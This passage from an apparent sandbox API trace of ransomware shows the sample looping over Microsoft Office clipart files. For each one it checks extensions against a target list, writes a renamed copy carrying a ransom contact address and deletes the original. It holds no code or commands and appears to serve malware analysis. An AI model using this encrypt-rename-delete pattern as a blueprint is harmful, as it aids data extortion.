lpString2=".WMF") returned -1 [0066.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 68 [0066.395] lstrlenW (lpString=".1cd") returned 4 [0066.395] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 68 [0066.395] lstrlenW (lpString=".jpg") returned 4 [0066.395] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.396] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.396] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01084_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0066.396] GetLastError () returned 0x0 [0066.396] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x96c, lpOverlapped=0x0) returned 1 [0066.456] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x970, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x970, lpOverlapped=0x0) returned 1 [0066.457] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0066.457] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0066.457] SetEndOfFile (hFile=0x2c0) returned 1 [0066.457] CloseHandle (hObject=0x2c0) returned 1 [0066.457] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.457] SetEndOfFile (hFile=0x2c8) returned 1 [0066.458] CloseHandle (hObject=0x2c8) returned 1 [0066.458] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.458] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01084_.wmf")) returned 1 [0066.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 68 [0066.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 68 [0066.462] lstrlenW (lpString=".doc") returned 4 [0066.462] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.462] lstrlenW (lpString=".docx") returned 5 [0066.462] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.462] lstrlenW (lpString=".pdf") returned 4 [0066.462] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.462] lstrlenW (lpString=".xls") returned 4 [0066.462] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.462] lstrlenW (lpString=".xlsx") returned 5 [0066.462] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.462] lstrlenW (lpString=".ppt") returned 4 [0066.463] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 68 [0066.463] lstrlenW (lpString=".zip") returned 4 [0066.463] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.463] lstrlenW (lpString=".rar") returned 4 [0066.463] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.463] lstrlenW (lpString=".bz2") returned 4 [0066.463] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.463] lstrlenW (lpString=".7z") returned 3 [0066.463] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 68 [0066.463] lstrlenW (lpString=".dbf") returned 4 [0066.463] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 68 [0066.463] lstrlenW (lpString=".1cd") returned 4 [0066.463] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 68 [0066.463] lstrlenW (lpString=".jpg") returned 4 [0066.463] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.476] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.476] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.476] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01196_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0066.493] GetLastError () returned 0x0 [0066.493] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x91c, lpOverlapped=0x0) returned 1 [0066.524] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x920, lpOverlapped=0x0) returned 1 [0066.529] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0066.529] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0066.529] SetEndOfFile (hFile=0x384) returned 1 [0066.529] CloseHandle (hObject=0x384) returned 1 [0066.529] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.529] SetEndOfFile (hFile=0x2c8) returned 1 [0066.530] CloseHandle (hObject=0x2c8) returned 1 [0066.530] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.530] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01196_.wmf")) returned 1 [0066.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 68 [0066.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 68 [0066.530] lstrlenW (lpString=".doc") returned 4 [0066.531] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.531] lstrlenW (lpString=".docx") returned 5 [0066.531] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.531] lstrlenW (lpString=".pdf") returned 4 [0066.531] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.531] lstrlenW (lpString=".xls") returned 4 [0066.531] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.531] lstrlenW (lpString=".xlsx") returned 5 [0066.531] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.531] lstrlenW (lpString=".ppt") returned 4 [0066.531] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 68 [0066.531] lstrlenW (lpString=".zip") returned 4 [0066.531] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.531] lstrlenW (lpString=".rar") returned 4 [0066.531] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.531] lstrlenW (lpString=".bz2") returned 4 [0066.531] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.531] lstrlenW (lpString=".7z") returned 3 [0066.531] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 68 [0066.531] lstrlenW (lpString=".dbf") returned 4 [0066.531] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 68 [0066.531] lstrlenW (lpString=".1cd") returned 4 [0066.531] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 68 [0066.531] lstrlenW (lpString=".jpg") returned 4 [0066.531] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.536] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.536] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02088_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0066.539] GetLastError () returned 0x0 [0066.539] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xe70, lpOverlapped=0x0) returned 1 [0066.614] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe80, lpOverlapped=0x0) returned 1 [0066.714] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0066.714] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0066.714] SetEndOfFile (hFile=0x340) returned 1 [0066.714] CloseHandle (hObject=0x340) returned 1 [0066.714] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.714] SetEndOfFile (hFile=0x354) returned 1 [0066.715] CloseHandle (hObject=0x354) returned 1 [0066.715] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.715] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02088_.wmf")) returned 1 [0066.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 68 [0066.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 68 [0066.716] lstrlenW (lpString=".doc") returned 4 [0066.716] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.716] lstrlenW (lpString=".docx") returned 5 [0066.716] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.716] lstrlenW (lpString=".pdf") returned 4 [0066.716] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.717] lstrlenW (lpString=".xls") returned 4 [0066.717] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.717] lstrlenW (lpString=".xlsx") returned 5 [0066.717] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.717] lstrlenW (lpString=".ppt") returned 4 [0066.717] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 68 [0066.717] lstrlenW (lpString=".zip") returned 4 [0066.717] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.717] lstrlenW (lpString=".rar") returned 4 [0066.717] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.717] lstrlenW (lpString=".bz2") returned 4 [0066.717] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.717] lstrlenW (lpString=".7z") returned 3 [0066.717] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 68 [0066.717] lstrlenW (lpString=".dbf") returned 4 [0066.717] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 68 [0066.717] lstrlenW (lpString=".1cd") returned 4 [0066.717] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 68 [0066.717] lstrlenW (lpString=".jpg") returned 4 [0066.718] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.718] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.718] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02141_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0066.719] GetLastError () returned 0x0 [0066.719] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xa4c, lpOverlapped=0x0) returned 1 [0066.788] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xa50, lpOverlapped=0x0) returned 1 [0066.789] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0066.789] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0066.789] SetEndOfFile (hFile=0x340) returned 1 [0066.789] CloseHandle (hObject=0x340) returned 1 [0066.789] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.789] SetEndOfFile (hFile=0x354) returned 1 [0066.790] CloseHandle (hObject=0x354) returned 1 [0066.790] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.791] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02141_.wmf")) returned 1 [0066.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 68 [0066.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 68 [0066.795] lstrlenW (lpString=".doc") returned 4 [0066.795] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.795] lstrlenW (lpString=".docx") returned 5 [0066.795] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.795] lstrlenW (lpString=".pdf") returned 4 [0066.795] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.795] lstrlenW (lpString=".xls") returned 4 [0066.795] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.795] lstrlenW (lpString=".xlsx") returned 5 [0066.795] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.795] lstrlenW (lpString=".ppt") returned 4 [0066.795] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 68 [0066.795] lstrlenW (lpString=".zip") returned 4 [0066.795] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.795] lstrlenW (lpString=".rar") returned 4 [0066.795] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.795] lstrlenW (lpString=".bz2") returned 4 [0066.795] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.795] lstrlenW (lpString=".7z") returned 3 [0066.795] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 68 [0066.795] lstrlenW (lpString=".dbf") returned 4 [0066.795] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 68 [0066.795] lstrlenW (lpString=".1cd") returned 4 [0066.795] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 68 [0066.796] lstrlenW (lpString=".jpg") returned 4 [0066.796] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.804] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.804] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.804] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00057_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0066.805] GetLastError () returned 0x0 [0066.805] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xeb4, lpOverlapped=0x0) returned 1 [0066.806] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec0, lpOverlapped=0x0) returned 1 [0066.807] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0066.807] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0066.807] SetEndOfFile (hFile=0x384) returned 1 [0066.807] CloseHandle (hObject=0x384) returned 1 [0066.807] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.808] SetEndOfFile (hFile=0x388) returned 1 [0066.808] CloseHandle (hObject=0x388) returned 1 [0066.808] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.808] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00057_.wmf")) returned 1 [0066.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 68 [0066.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 68 [0066.809] lstrlenW (lpString=".doc") returned 4 [0066.809] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.809] lstrlenW (lpString=".docx") returned 5 [0066.809] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.809] lstrlenW (lpString=".pdf") returned 4 [0066.809] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.809] lstrlenW (lpString=".xls") returned 4 [0066.809] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.809] lstrlenW (lpString=".xlsx") returned 5 [0066.809] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.809] lstrlenW (lpString=".ppt") returned 4 [0066.809] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 68 [0066.809] lstrlenW (lpString=".zip") returned 4 [0066.809] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.809] lstrlenW (lpString=".rar") returned 4 [0066.809] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.809] lstrlenW (lpString=".bz2") returned 4 [0066.809] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.809] lstrlenW (lpString=".7z") returned 3 [0066.809] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 68 [0066.809] lstrlenW (lpString=".dbf") returned 4 [0066.809] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 68 [0066.809] lstrlenW (lpString=".1cd") returned 4 [0066.810] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 68 [0066.810] lstrlenW (lpString=".jpg") returned 4 [0066.810] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.810] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.810] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.810] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00084_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0066.810] GetLastError () returned 0x0 [0066.810] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x9a8, lpOverlapped=0x0) returned 1 [0066.813] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x9b0, lpOverlapped=0x0) returned 1 [0066.814] ReadFile 